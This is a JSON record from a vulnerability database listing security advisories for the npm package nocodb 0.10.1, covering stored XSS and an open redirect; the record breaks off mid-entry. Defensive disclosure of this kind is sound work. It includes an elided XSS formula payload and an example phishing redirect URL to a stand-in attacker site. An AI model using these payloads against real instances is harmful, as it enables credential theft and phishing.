{"url":"http://public2.vulnerablecode.io/api/packages/559749?format=json","purl":"pkg:npm/nocodb@0.10.1","type":"npm","namespace":"","name":"nocodb","version":"0.10.1","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21276?format=json","vulnerability_id":"VCID-3tyz-qt9n-87da","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting via Comments and Rich Text Cells\n### Summary\nUser-controlled content in comments and rich text cells was rendered via `v-html` without sanitization, enabling stored XSS.\n\n### Details\nComments in `Comments.vue` and rich text in `TextArea.vue` were parsed by markdown-it with `html: true` and injected via `v-html`. The codebase had `vue-dompurify-html` available but these paths used raw `v-html`. Server-side, `Comment.insert()` used `extractProps()` instead of `extractPropsAndSanitize()`.\n\nCommenter role is sufficient for the comments vector; Editor role for rich text.\n\nThis issue was independently reported; see also GHSA-rcph-x7mj-54mm and GHSA-wwp2-x4rj-j8rm for the same root cause found by GitHub Security Lab.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the comment or cell.\n\n### Credit\nThis issue was reported by [@bugbunny-research](https://github.com/bugbunny-research) (bugbunny.ai).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28398","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12693","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28398"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:22Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8vm4-g489-v3w7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:22Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8vm4-g489-v3w7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28398","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28398"},{"reference_url":"https://github.com/advisories/GHSA-8vm4-g489-v3w7","reference_id":"GHSA-8vm4-g489-v3w7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vm4-g489-v3w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28398","GHSA-8vm4-g489-v3w7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3tyz-qt9n-87da"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22743?format=json","vulnerability_id":"VCID-4amk-tc13-m7c5","summary":"NocoDB has Stored Cross-site Scripting via Formula Cell\n### Summary\nA stored XSS vulnerability exists in the Formula virtual cell. Formula results containing `URI::()` patterns are rendered via `v-html` without sanitization, allowing injected HTML to execute.\n\n### Details\nThe `replaceUrlsWithLink()` function in `urlUtils.ts` converts `URI::(url)` patterns to `<a>` tags but passes all other HTML through unchanged. A user with Creator role (minimum role for formula field creation) can craft a formula like `CONCAT(\"URI::(https://example.com)\", \"<img src=x onerror=...>\")` to inject arbitrary scripts rendered for all viewers.\n\n### Impact\nCredential theft via script execution in the context of users viewing the table.\n\n### Credit\nThis issue was reported by [@Akokonunes](https://github.com/Akokonunes).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28357","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12693","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28357"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-02T16:50:04Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-vx5p-q85x-xm3c","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-02T16:50:04Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-vx5p-q85x-xm3c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28357","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28357"},{"reference_url":"https://github.com/advisories/GHSA-vx5p-q85x-xm3c","reference_id":"GHSA-vx5p-q85x-xm3c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vx5p-q85x-xm3c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28357","GHSA-vx5p-q85x-xm3c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4amk-tc13-m7c5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53228?format=json","vulnerability_id":"VCID-ctkq-rnus-b7au","summary":"Cross-site Scripting in NocoDB\nCross-site Scripting (XSS) - Stored in GitHub repository nocodb/nocodb prior to 0.91.9.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2079","reference_id":"","reference_type":"","scores":[{"value":"0.00509","scoring_system":"epss","scoring_elements":"0.66643","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2079"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/362f8f0869989bc13bdcd66c6fc9c86ac79b9992","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/362f8f0869989bc13bdcd66c6fc9c86ac79b9992"},{"reference_url":"https://github.com/nocodb/nocodb/issues/2262","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/issues/2262"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2343","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2343"},{"reference_url":"https://github.com/nocodb/nocodb/releases","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/releases"},{"reference_url":"https://huntr.dev/bounties/2615adf2-ff40-4623-97fb-2e4a3800202a","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/2615adf2-ff40-4623-97fb-2e4a3800202a"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2079","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2079"},{"reference_url":"https://github.com/advisories/GHSA-hv6q-5g4f-8897","reference_id":"GHSA-hv6q-5g4f-8897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hv6q-5g4f-8897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/94585?format=json","purl":"pkg:npm/nocodb@0.91.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.9"}],"aliases":["CVE-2022-2079","GHSA-hv6q-5g4f-8897"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ctkq-rnus-b7au"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18917?format=json","vulnerability_id":"VCID-cyff-z51h-3ka5","summary":"NocoDB has Unvalidated Redirect in Login Flow via continueAfterSignIn Parameter\n### Summary\n\nAn **unvalidated redirect (open redirect)** vulnerability exists in NocoDB’s login flow due to missing validation of the `continueAfterSignIn` parameter.\n\nDuring authentication, NocoDB processes a user-controlled redirect value and conditionally performs client-side navigation without enforcing any restrictions on the destination’s origin, domain or protocol. This allows attackers to redirect authenticated users to arbitrary external websites after login.\n\n### Root Cause\n\nThe redirect logic relies on a permissive URL check that treats any absolute or protocol-relative URL as safe, and performs navigation without applying an allowlist or origin validation.\n\nIn the redirect plugin:\n\n* The helper function `isFullUrl` uses the following regular expression:\n\n  ```ts\n  /^(https?:)?\\/\\//\n  ```\n\n  This pattern matches any HTTP(S) URL as well as protocol-relative URLs (e.g., `//evil.example`), without restricting allowed domains.\n\n* When the `continueAfterSignIn` query parameter matches this pattern, the application performs an unconditional external navigation:\n\n  ```ts\n  navigateTo(route.value.query.continueAfterSignIn as string, {\n    external: isFullUrl(...)\n  })\n  ```\n\n### Attack Scenario\n\nAn attacker can exploit this issue through a phishing attack:\n\n1. The attacker crafts a malicious login URL containing a controlled redirect target, for example:\n\n   ```\n   https://victim-nocodb.example/#/signin?continueAfterSignIn=https://evil-phishing.com/fake-login\n   ```\n2. The victim clicks the link and is presented with the legitimate NocoDB login page.\n3. The victim authenticates using valid credentials.\n4. After login, NocoDB automatically redirects the victim to the attacker-controlled external site.\n5. The attacker’s site displays a fake error message and prompts the victim to re-enter credentials.\n6. The victim unknowingly submits credentials to the attacker.\n\n### Impact\n\nThis vulnerability enables **phishing attacks** by leveraging user trust in the legitimate NocoDB login flow. While it does not directly expose credentials or bypass authentication, it increases the likelihood of credential theft through social engineering.\n\nThe issue does not allow arbitrary code execution or privilege escalation, but it undermines authentication integrity.\n\n### Credit\n\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members [@p- (Peter Stöckli)](https://github.com/p-) and [@m-y-mo (Man Yue Mo)](https://github.com/m-y-mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24768","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05304","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24768"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3hmw-8mw3-rmpj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-29T16:03:11Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3hmw-8mw3-rmpj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24768","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24768"},{"reference_url":"https://github.com/advisories/GHSA-3hmw-8mw3-rmpj","reference_id":"GHSA-3hmw-8mw3-rmpj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3hmw-8mw3-rmpj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/53048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24768","GHSA-3hmw-8mw3-rmpj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cyff-z51h-3ka5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23617?format=json","vulnerability_id":"VCID-ev8h-9es8-rkhj","summary":"NocoDB Vulnerable to Stored Cross-site Scripting via Rich Text Field\n### Summary\nAn authenticated user with Editor role can inject arbitrary HTML into Rich Text cells by bypassing the TipTap editor and sending raw HTML via the API.\n\n### Details\nThe TipTap editor sanitizes HTML client-side, but the backend stores raw HTML without server-side sanitization. The stored content is rendered via `v-html` in `TextArea.vue` through `NcMarkdownParser.parse()` which performs no sanitization.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the cell.\n\n### Credit\nThis issue was reported by [@Akokonunes](https://github.com/Akokonunes).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28359","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12693","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28359"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:06:57Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-qxwq-q265-hc44","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:06:57Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-qxwq-q265-hc44"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28359","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28359"},{"reference_url":"https://github.com/advisories/GHSA-qxwq-q265-hc44","reference_id":"GHSA-qxwq-q265-hc44","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qxwq-q265-hc44"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28359","GHSA-qxwq-q265-hc44"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ev8h-9es8-rkhj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22309?format=json","vulnerability_id":"VCID-f8dr-ugxz-abb1","summary":"NocoDB Vulnerable to Stored Cross-site Scripting via Comments\n### Summary\nComments rendered via `v-html` without sanitization, enabling stored XSS.\n\n### Details\nComments in `Comments.vue` were parsed by markdown-it with `html: true` and injected via `v-html` without DOMPurify. A user with Commenter role can inject arbitrary HTML that executes for all viewers.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the comment.\n\n### Credit\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members [@p-](https://github.com/p-) (Peter Stockli) and [@m-y-mo](https://github.com/m-y-mo) (Man Yue Mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28397","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02553","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28397"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:50Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-rcph-x7mj-54mm","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:50Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-rcph-x7mj-54mm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28397","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28397"},{"reference_url":"https://github.com/advisories/GHSA-rcph-x7mj-54mm","reference_id":"GHSA-rcph-x7mj-54mm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rcph-x7mj-54mm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28397","GHSA-rcph-x7mj-54mm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f8dr-ugxz-abb1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23188?format=json","vulnerability_id":"VCID-fvtg-v6h6-r7cf","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting via Rich Text Cells\n### Summary\nRich text cell content rendered via `v-html` without sanitization, enabling stored XSS.\n\n### Details\nRich text in `TextArea.vue` was parsed by markdown-it with `html: true` and injected via `v-html` without DOMPurify. A user with Editor role can inject arbitrary HTML that executes for all viewers.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the cell.\n\n### Credit\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members [@p-](https://github.com/p-) (Peter Stockli) and [@m-y-mo](https://github.com/m-y-mo) (Man Yue 